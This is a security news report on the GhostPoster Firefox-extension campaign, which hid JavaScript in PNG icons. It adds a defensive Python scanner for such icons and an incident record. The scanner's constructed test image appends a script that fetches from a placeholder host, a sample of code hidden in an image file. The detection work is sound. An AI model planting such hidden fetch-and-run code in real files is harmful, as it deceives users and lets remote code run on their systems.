Mozilla: GhostPoster Malware Hit 50K Users via Firefox Extension Icons

GhostPoster Campaign Exploits Firefox Extensions with Steganography, Infecting 50,000+ Users

Researchers at Koi have exposed GhostPoster, a large-scale malware campaign targeting Firefox users through malicious browser extensions. The attack uses steganography, hiding executable JavaScript inside PNG icon files to evade detection, and has infected over 50,000 users via seemingly legitimate add-ons.

The campaign spans at least 17 Firefox extensions, including Free VPN Forever (16,000+ installs), which remains available on the Firefox Add-ons marketplace. These extensions masquerade as benign tools offering VPN access, translation, weather updates, or ad blocking while delivering a multi-stage malware payload that compromises browser security.

How GhostPoster Works

  1. Initial Infection: Extensions load their icon files, which contain hidden JavaScript delimited by a === marker sequence. The code runs each time the extension loads, and static scans miss it because the file still looks like an ordinary image.
  2. Loader Stage: The embedded script retrieves additional payloads from attacker-controlled domains (liveupdt[.]com or dealctr[.]com), using a unique signature to track infections.
  3. Evasion Tactics: The malware checks in with its servers only every 48 hours and downloads a payload on just 10% of those check-ins, making detection difficult. Payloads are obfuscated via Base64, XOR encryption, and runtime ID-based encoding, and data is kept in browser memory rather than written to disk.
  4. Browser Takeover: Once active, the malware hijacks affiliate links, injects tracking code (using Google Analytics IDs), strips security headers (e.g., Content-Security-Policy), and enables remote code execution. Additional capabilities include CAPTCHA bypass, ad fraud, and dynamic cleanup to avoid forensic traces.
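As an added example (not code from the article, from Koi, or from Mozilla), here is a defender-side scanner for the technique in steps 1 and 2: it parses a PNG chunk by chunk, validates CRCs, and reports whether a === marker followed by script-like text sits in a non-critical chunk or in bytes appended after IEND. It assumes the marker is the literal bytes `===`, checks both locations because the article does not say where in the file the script sits, and uses a keyword heuristic (`JS_HINTS`), a constructed sample image and a placeholder `example.invalid` URL that are all mine.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
MARKER = b"==="  # separator the article says precedes the hidden script (assumed literal bytes)
JS_HINTS = (b"function", b"eval(", b"fetch(", b"document.", b"=>", b"XMLHttpRequest")

def png_chunks(data):
    """Yield (type, body, end_offset) per chunk; raise on bad signature, bad CRC or missing IEND."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        body = data[pos + 8:end - 4]  # a truncated chunk just fails the CRC check below
        if zlib.crc32(ctype + body) != int.from_bytes(data[end - 4:end], "big"):
            raise ValueError(f"bad CRC or truncated chunk {ctype!r}")
        yield ctype, body, end
        pos = end
        if ctype == b"IEND":
            return
    raise ValueError("no IEND chunk")

def _flag(report, blob, where):
    tail = blob.split(MARKER, 1)[1]  # bytes following the marker
    report.update(marker=True, where=where, script_like=any(h in tail for h in JS_HINTS))

def scan_png(data):
    """Look for the marker in non-critical chunk bodies and in bytes appended after IEND."""
    report = {"marker": False, "script_like": False, "where": None, "trailer_bytes": 0}
    for ctype, body, end in png_chunks(data):
        if ctype not in (b"IHDR", b"PLTE", b"IDAT", b"IEND") and MARKER in body:
            _flag(report, body, ctype.decode("latin-1"))
    trailer = data[end:]  # decoders stop at IEND, so an icon with a trailer still renders
    report["trailer_bytes"] = len(trailer)
    if MARKER in trailer:
        _flag(report, trailer, "after IEND")
    return report

def _chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def make_png():
    """Constructed 1x1 grayscale PNG used as sample input (not a campaign artefact)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(b"\x00\x00")) + _chunk(b"IEND", b"")

CLEAN_PNG = make_png()
TAINTED_PNG = CLEAN_PNG + MARKER + b"(function(){fetch('https://example.invalid/p');})();"  # constructed
```

Run `scan_png` over every `.png` inside an unpacked extension (an XPI is a zip archive); a non-zero trailer or a marker hit is worth a manual look, since many benign icons carry no bytes at all after IEND.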

Impact & Broader Trends

GhostPoster exploits user trust in browser extensions, a growing attack vector. By embedding malware in images and distributing it through official marketplaces, attackers bypass traditional security measures. The campaign highlights the risks of implicit trust in extensions, reinforcing the need for zero-trust principles in cybersecurity.

Firefox has not yet removed all affected extensions, leaving users vulnerable to persistent browser compromise.

Source: https://www.esecurityplanet.com/threats/ghostposter-malware-hit-50k-users-via-firefox-extension-icons/

Mozilla cybersecurity rating report: https://www.rankiteo.com/company/mozilla-corporation

Rankiteo incident record:
  id: MOZ1779280296
  linkid: mozilla-corporation
  type: Cyber Attack
  date: 12/2025
  severity: 85
  impact: 4
  explanation: Attack with significant impact with customers data leaks
{'affected_entities': [{'customers_affected': '50,000+',
                        'location': 'Global',
                        'name': 'Firefox Users',
                        'size': '50,000+ users',
                        'type': 'Individuals'},
                       {'industry': 'Technology',
                        'location': 'Global',
                        'name': 'Firefox Add-ons Marketplace',
                        'type': 'Software Distribution Platform'}],
 'attack_vector': 'Malicious Browser Extensions',
 'data_breach': {'data_exfiltration': 'Possible (payloads retrieved from '
                                      'attacker-controlled domains)',
                 'file_types_exposed': 'PNG (with embedded JavaScript), '
                                       'obfuscated payloads (Base64, XOR, '
                                       'runtime ID-based encoding)',
                 'sensitivity_of_data': 'Medium (browser activity, tracking '
                                        'data)',
                 'type_of_data_compromised': 'Browser session data, tracking '
                                             'information, potential remote '
                                             'access'},
 'description': 'Researchers at Koi have exposed GhostPoster, a large-scale '
                'malware campaign targeting Firefox users through malicious '
                'browser extensions. The attack leverages steganography hiding '
                'executable JavaScript within PNG icon files to evade '
                'detection, infecting over 50,000 users via seemingly '
                'legitimate add-ons. The campaign spans at least 17 Firefox '
                'extensions, including Free VPN Forever (16,000+ installs), '
                'which remains available on the Firefox Add-ons marketplace. '
                'These extensions masquerade as benign tools offering VPN '
                'access, translation, weather updates, or ad blocking while '
                'delivering a multi-stage malware payload that compromises '
                'browser security.',
 'impact': {'brand_reputation_impact': 'Erosion of user trust in Firefox '
                                       'extensions and marketplace security',
            'data_compromised': 'Browser session data, tracking information, '
                                'potential remote code execution access',
            'operational_impact': 'Browser security compromise, affiliate '
                                  'fraud, ad injection, CAPTCHA bypass',
            'systems_affected': 'Firefox browsers with malicious extensions '
                                'installed'},
 'initial_access_broker': {'backdoors_established': 'Persistent browser '
                                                    'compromise via remote '
                                                    'payloads',
                           'entry_point': 'Malicious Firefox extensions'},
 'investigation_status': 'Ongoing (extensions still available on Firefox '
                         'Add-ons marketplace)',
 'lessons_learned': 'The incident highlights the risks of implicit trust in '
                    'browser extensions and the need for zero-trust principles '
                    'in cybersecurity. Steganography and evasion tactics like '
                    'low-frequency payload downloads make detection difficult. '
                    'Stricter vetting of extensions in marketplaces is '
                    'necessary.',
 'motivation': 'Financial gain (affiliate link hijacking, ad fraud), data '
               'exfiltration, remote code execution',
 'post_incident_analysis': {'corrective_actions': 'Firefox should remove '
                                                  'malicious extensions, '
                                                  'improve extension review '
                                                  'processes, and implement '
                                                  'runtime monitoring for '
                                                  'suspicious behavior',
                            'root_causes': 'Lack of strict vetting for Firefox '
                                           'extensions, exploitation of '
                                           'steganography to hide malicious '
                                           'code, user trust in '
                                           'marketplace-distributed '
                                           'extensions'},
 'recommendations': ['Implement zero-trust principles for browser extensions',
                     'Enhance marketplace vetting processes for extensions',
                     'Monitor for steganography-based attacks in browser '
                     'environments',
                     'Educate users on the risks of malicious extensions',
                     'Deploy behavioral analysis tools to detect anomalous '
                     'extension activity'],
 'references': [{'source': 'Koi Research'}],
 'response': {'third_party_assistance': 'Koi (researchers)'},
 'threat_actor': 'GhostPoster Campaign',
 'title': 'GhostPoster Campaign Exploits Firefox Extensions with '
          'Steganography, Infecting 50,000+ Users',
 'type': 'Malware Campaign',
 'vulnerability_exploited': 'Steganography (hidden JavaScript in PNG files), '
                            'lack of strict extension vetting'}